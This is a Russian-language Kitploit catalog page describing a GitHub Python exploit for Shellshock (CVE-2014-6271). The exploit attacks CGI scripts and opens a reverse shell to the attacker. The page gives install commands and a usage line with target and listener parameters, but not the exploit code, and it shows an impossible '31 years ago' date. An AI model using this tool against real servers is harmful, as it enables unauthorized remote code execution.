Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Shellshock_vuln_Exploit — Эксплойт на Python для CVE-2014-6271 (Shellshock), нацеленный на уязвимые CGI-скрипты с обработчиком reverse shell, поддерживающий HTTP/HTTPS, пользовательские пути и прокси. | Kitploit
Инструменты/GitHubGitHub/knightc0de/shellshock_vuln_exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubknightc0de/shellshock_vuln_exploit

Shellshock_vuln_Exploit

Эксплойт на Python для CVE-2014-6271 (Shellshock), нацеленный на уязвимые CGI-скрипты с обработчиком reverse shell, поддерживающий HTTP/HTTPS, пользовательские пути и прокси.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 Эксплойт Shellshock RCE (CVE-2014-6271)

Это Python-эксплойт для уязвимости Shellshock (CVE-2014-6271), которая затрагивает GNU Bash. Эксплойт нацелен на CGI-скрипты на уязвимых веб-серверах и устанавливает обратную оболочку (reverse shell) на машину атакующего.


Идентификатор CVE

CVE-2014-6271


Отказ от ответственности

Этот инструмент предназначен только для образовательных и этических целей.


Возможности

  • Эксплуатирует уязвимые CGI-скрипты с помощью Shellshock
  • Обработчик обратной оболочки (reverse shell)
  • Поддерживает:
    • HTTP & HTTPS
    • Пользовательские пути CGI
    • поддержку прокси
  • Интерактивная оболочка при успехе

Информация о CVE

  • CVE: CVE-2014-6271
  • Уязвимость: инъекция команд в переменные окружения GNU Bash
  • Воздействие: удаленное выполнение кода (RCE) специально созданные заголовки для CGI-приложений

Требования

  • Python 3.x
  • pwntools
  • requests

Установка

sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py

Пример использования

python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg
Скачать инструмент